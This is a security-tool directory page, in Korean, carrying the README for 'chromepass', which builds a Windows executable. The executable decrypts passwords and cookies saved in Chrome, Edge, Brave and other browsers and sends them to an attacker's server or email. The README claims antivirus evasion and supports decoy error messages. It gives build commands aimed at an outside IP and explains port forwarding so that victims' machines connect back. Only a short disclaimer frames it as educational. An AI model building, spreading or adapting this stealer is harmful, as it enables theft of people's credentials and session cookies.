Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
chromepass — Chromepass - Chrome 저장된 비밀번호 해킹 | Kitploit
도구/GitHubGitHub/darkarp/chromepass
Password CrackingData ExfiltrationPhishingRed Teaming
GitHubdarkarp/chromepass

chromepass

Chromepass - Chrome 저장된 비밀번호 해킹

저장소 보기
8381114년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Chromepass - Chrome 저장된 비밀번호 및 쿠키 해킹

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

데모 보기 · 버그 신고 · 기능 요청

목차

  • 프로젝트 소개
    • AV 탐지
  • 시작하기
    • 사전 요구사항
    • 설치
  • 사용법
  • 이메일
  • 오류, 버그 및 기능 요청
  • 더 알아보기
  • 라이선스
  • 데모

프로젝트 소개

Chromepass는 다음과 같은 기능을 제공하는 Windows 실행 파일을 생성하는 Python 기반 콘솔 애플리케이션입니다.

  • Google Chrome, Chromium, Edge, Brave, Opera 및 Vivaldi의 저장된 비밀번호와 쿠키 복호화
  • 원격으로 로그인/비밀번호 조합 및 쿠키 파일 전송 (HTTP 서버 또는 이메일)
  • 올바르게 수행할 경우 AV 탐지 불가
  • 사용자 정의 아이콘
  • 사용자 정의 오류 메시지
  • 포트 사용자 정의

AV 탐지!

새로운 클라이언트 빌드 방법론은 AV 회피 전술 없이도 사실상 0% 탐지율을 보장합니다. 향후 이 사실이 깨질 경우 AV 회피를 개선하기 위한 몇 가지 방법이 구현될 예정입니다.

최신 스캔 예시 (참고: 10~12시간 내에 0-2건 탐지에서 32건 탐지로 증가하므로 직접 빌드한 파일을 분석하세요):

  • VirusTotal Scan 1
  • VirusTotal Scan 2
  • VirusTotal Scan 3
  • VirusTotal Scan 4

시작하기

사전 요구사항 및 의존성

매우 간단한 애플리케이션으로, 다음만 사용합니다:

  • Python - Python 3.9+에서 테스트 완료

설치는 Windows VM 내에서 수행하는 것이 좋습니다. 설치 절차의 일부가 기존 구성에 영향을 받을 수 있습니다. 이는 깨끗한 Windows 10 VM에서 테스트되었습니다.

설치

Chromepass는 컴파일을 위해 Windows가 필요합니다! Linux 및 macOS 지원은 곧 추가될 수 있습니다.

저장소 클론:

root@kitploit:~
git clone https://github.com/darkarp/chromepass

참고: 저장소를 클론하는 대신 최신 릴리스를 다운로드할 수도 있습니다. 저장소는 버그가 더 많을 수 있습니다.

의존성 설치:

의존성은 자동으로 확인 및 설치되므로 사용법으로 바로 넘어가셔도 됩니다. 충돌이 없도록 깨끗한 VM을 사용하는 것이 좋습니다.

의존성이 없고 인터넷 속도가 느리면 시간이 오래 걸릴 수 있습니다. 커피 한 잔 하면서 기다리세요.


사용법

Chromepass는 매우 직관적입니다. 다음 명령으로 실행하세요:

root@kitploit:~
python create.py -h

옵션 목록이 나타나며 설명이 포함되어 있습니다.

매개변수 없이 실행하면 127.0.0.1에 연결되는 서버와 클라이언트가 빌드됩니다.

빌드 예시:

root@kitploit:~
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

서버와 클라이언트를 생성한 후, 클라이언트가 실행될 때 서버가 실행 중인지 확인하세요.

쿠키와 비밀번호는 서버와 동일한 디렉토리에 있는 data라는 새 폴더에 IP 주소별로 분리된 json 파일로 저장됩니다.


이메일

Chromepass는 이메일을 통한 파일 전송을 지원하지만 아직 실험적 기능입니다. 이 기능을 활성화하려면 서버 생성 시 --email 플래그를 사용하세요. 사용자 이름(이메일)과 비밀번호(앱 비밀번호)가 필요합니다.

앱 비밀번호를 생성하려면 계정 설정 -> 보안으로 이동하여 2단계 인증을 활성화해야 합니다. (필수!)

2단계 인증이 활성화되면 앱 비밀번호라는 새 옵션이 나타납니다: 2단계 인증

해당 옵션을 클릭하고 적절한 옵션을 선택한 후 비밀번호를 생성하세요: 2단계 인증

생성을 클릭하면 필요한 비밀번호가 제공됩니다. 명령어에 사용자 이름과 비밀번호를 직접 입력하거나, config.ini 파일의 YOUR_USERNAME 및 YOUR_PASSWORD 부분에 넣을 수 있습니다.

명령어에 자격 증명 포함 예시

root@kitploit:~
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh

config 파일에 자격 증명을 입력한 경우 (파일을 열면 위치를 확인할 수 있습니다)

root@kitploit:~
python create.py --error --message 'An Error has happened' --email

원격 사용 참고사항

원격 시나리오에서 사용하려면 포트 포워딩(기본 포트 80)도 수행해야 합니다. 그래야 피해자가 클라이언트를 실행할 때 올바른 포트로 서버에 연결할 수 있습니다.
일반적인 정보는 여기를 클릭하세요. 더 자세한 내용은 구글 검색을 수행하세요.


수동 의존성 설치

자동 설정은 실험적입니다. 여러 이유로 인해 설정이 의존성을 올바르게 설치하지 못할 수 있습니다. 그 경우 수동으로 설치해야 합니다.
다행히 의존성은 2개뿐입니다:

  • Microsoft Visual C++ Build Tools (권장 워크로드로 설치)
  • Rustup

빌드 도구 대신 Visual Studio를 설치해도 되지만 더 많은 공간을 차지합니다.

빌드 도구를 성공적으로 설치한 후, Rustup 웹사이트에서 rustup-init.exe를 실행하면 됩니다.

이것으로 필요한 의존성 설치가 완료되며, 준비가 완료됩니다.


오류, 버그 및 기능 요청

오류나 버그를 발견하면 이슈로 보고해 주세요. 기능이나 개선 사항을 제안하려면 이슈 페이지에 보고해 주세요.

이슈 생성 시 표시되는 템플릿을 따라주세요.


더 알아보기

완전 초보자부터 노련한 베테랑까지 다양한 컴퓨터 보안 전문가 지망생 커뮤니티에 참여하려면 Discord 서버에 가입하세요: WhiteHat Hacking

저에게 연락하고 싶다면 다음 이메일로 보내주세요: [email protected]


면책조항

제공된 정보와 코드를 사용하여 발생하는 결과에 대해 저는 책임을 지지 않습니다. 이는 전문적 또는 교육적 목적으로만 사용됩니다.

라이선스

AGPL-3.0


Code Intelligence Status

데모

til

도구 다운로드